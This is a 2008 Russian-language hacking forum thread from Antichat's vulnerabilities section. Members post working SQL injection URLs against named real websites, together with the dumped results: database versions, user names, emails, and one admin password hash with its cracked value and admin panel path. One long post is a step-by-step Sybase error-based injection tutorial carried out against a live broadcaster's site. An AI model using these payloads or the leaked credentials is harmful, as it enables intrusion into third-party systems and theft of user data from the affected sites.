ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5131  
Старый 19.03.2008, 01:23
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

www.masterphoto.ru

5.0.45-community/master_masterpho@localhost/master_masterphoto

http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(name,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +user/*


Таблицы:
user
Поля:
name
email


Поля с паролями не подобрал
 
Ответить с цитированием

  #5132  
Старый 19.03.2008, 06:03
Аватар для Muhacir
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию

Цитата:
Сообщение от Tigger  
www.masterphoto.ru

5.0.45-community/master_masterpho@localhost/master_masterphoto

http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(name,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +user/*


Таблицы:
user
Поля:
name
email


Поля с паролями не подобрал

http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(user_password,char(58)),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+php bb_users%20where%20user_id=2/*

masterphoto:786c2704f76e06e44aad1e0213d26018:gbcbr henj

http://www.masterphoto.ru/forum/admin/

там еше и форум есть а я спать

Последний раз редактировалось Muhacir; 19.03.2008 в 06:09..
 
Ответить с цитированием

  #5133  
Старый 19.03.2008, 16:59
Аватар для ReVOLVeR
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

Крупный хостиг в зоне кз
http://user.kz/files/cifry.php?sid=-9965481+union+select+1,2,3,4,5,6,7/*

http://handbook.ecu.edu.au/CourseStructure.asp?disyear=2008+and+1=1--&CID=1&USID=0&UCID=0&UID=0&Ver=0&HB=HB&SC=
 
Ответить с цитированием

  #5134  
Старый 19.03.2008, 17:14
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

ReVOLVeR
Хорош прикалываться
1.баян
2.вобще люкс: твой пост
_http://forum.antichat.ru/showpost.php?p=621958&postcount=5162
 
Ответить с цитированием

  #5135  
Старый 19.03.2008, 19:30
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Хм, чето только мускул один, есть же и другие: Postgre, Mssql, Sybase и т.д. осбенно мало на форумах постят про Sybase...
вобщем Sybase использует Transact-SQL, как например MS Access и MSSQL но они отличаются немного, вот пример:
Получаем данные через вывод сообщения об ошибке приведения типов.
версия:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(@@version))--
Цитата:
Adaptive Server Enterprise/12.5.0.3/EBF 11450 ESD#4/P/Linux Intel/Linux 2.4.18-18.7.xsmp i686/rel12503/1940/32-bit/OPT/Sun Sep 21 03:10:00 2003
текущий пользователь:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(user_name()))--
Цитата:
rf
имена бд:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins))--
Цитата:
sybsystemdb
следующее имя бд:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins+where+dbname+not+in+(0x73796273797374656D6462)))--
Цитата:
rfprod
здесь 0x73796273797374656D6462=hex('sybsystemdb')

следующее имя:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+master..syslogins+where+dbname+not+in+(0x726670726F64,0x73796273797374656D6462)))--
Цитата:
master
0x726670726F64=hex('rfprod') и т.д.

узнаем таблицы в бд rfprod (в других по аналогии):
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,id))+from+rfprod..sysobjects+where+type=0x55))--
Цитата:
wifi_reactions:1785877529
тут надо пояснить, || -знак конкатенации (объединения) в sybase, convert(char,id) нужен для того, что бы привести числовое поле id (очень нужное) к символьному типу, иначе возникнет ошибка несоответствия типов, from+rfprod..sysobjects означает то, что мы выбираем значения из системной таблицы sysobjects базы данных rfprod, в этой таблице хранятся записи об объектах этой бд, но нам нужны не все объекты, а только пользовательские таблицы, они имеют тип U, hex('U')=0x55 (where+type=0x55) надеюсь с этим все понятно

узнаем имя следующей таблицы:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,id))+from+rfprod..sysobjects+where+type=0x55+and+id+not+in+(1785877529)))--
Цитата:
wifi_inscriptions:1753877415
поясню, т.к. id уникально, для перебора удобнее использовать именно его

узнаем поля таблицы wifi_reactions (id=1785877529) (другие таблицы по аналогии):
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,colid))+from+rfprod..syscolumns+where+id=1785877529))--
Цитата:
ville:4
Тут тоже нужно пояснить: colid - это идентификационный номер поля, он не несет смысловой нагрузги, но его удобно использовать при переборе, from+rfprod..syscolumns означает то, что мы выбираем значения из системной таблицы syscolumns базы данных rfprod, в этой таблице хранятся записи об колонках этой бд! (а не только одной таблицы), where+id=1785877529 - указывает колонки какой таблицы выбирать, я ранее говорил, что id таблицы очень важное для нас значение, так вот определение того, к какой таблице принадлежит имя поля, происходит именно по id таблицы и только по id

узнаем имя следующего поля:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||convert(char,colid))+from+rfprod..syscolumns+where+id=1785877529+and+colid+not+in+(4)))--
Цитата:
reactions:5
и т.д

получаем данные из таблицы wifi_reactions:
Код:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(convert(varchar,reactions)||0x3a||ville)+from+rfprod..wifi_reactions))--
Цитата:
utilisateur du wifi depuis ces:grenoble
что это такое, фиг его знает, но нам важны не данные, а принцип получения данных, convert(varchar,reactions) - нужен для того, что бы привести данные из поля reactions, которое имеет тип VARBINARY, к типу varchar для совместимости, если этого не сделать, появится ошибка несовместимости типов

Ну вроде пока все, так вот из обычного поста получилась небольшая статейка для новичков, об SQL-inj в SYBASE Adaptive Server Enterprise

ЗЫ в ASE жесткое разграничение прав пользователей, для пользователя может быть ограничен доступ не только к БД и таблице БД, но также и к отдельному полю таблицы
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 19.03.2008 в 19:35..
 
Ответить с цитированием

  #5136  
Старый 20.03.2008, 03:41
Аватар для diehard
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715

Репутация: 659


Отправить сообщение для diehard с помощью ICQ
По умолчанию

http://www.gallery1905.ru/news/more.php?id=-42+union+select+1,version(),3,4,5,6,7,8/*
 
Ответить с цитированием

  #5137  
Старый 20.03.2008, 04:23
Аватар для Muhacir
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию

http://www.videoland.nl/index_film_record.php?id=4370455454+union+select+0 ,1,2+from+a

таблицы

http://www.seatsandsofas.nl/info.php?id=7&lang_id=1&country_id=1444'union+sele ct+0,1,2,3,4+from+users/*
+таблицa: admin

Последний раз редактировалось Muhacir; 20.03.2008 в 13:57..
 
Ответить с цитированием

  #5138  
Старый 20.03.2008, 22:13
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
Smile

Сервс провайдер на рынке SMS
+ моя первая скуля.
Цитата:
http://melody.e-vostok.ru/info_video.php?id=501&service=10671'+UNION+SELECT+ 1,2,3,version(),user(),6,7,8,9/*
user: sms@212.111.95.84
Log: Debian_7etch4-log
version: 5.0.32
 
Ответить с цитированием

  #5139  
Старый 20.03.2008, 22:40
Аватар для samarin
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Цитата:
http://td-postavka.com/news_one.php?news_id=-1411+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26/*
csuser@localhost.localdomain
citysite
4.0.16
 
Ответить с цитированием

  #5140  
Старый 21.03.2008, 00:54
Аватар для cash$$$
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

webmonger.net
Цитата:
http://www.webmonger.net/policiesdetail.php?id=99999+union+select+1,VERSION (),3/*
VERSION: 4.1.22-standard
USER: webmonge@localhost
DATABASE: webmonge_webmonger
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ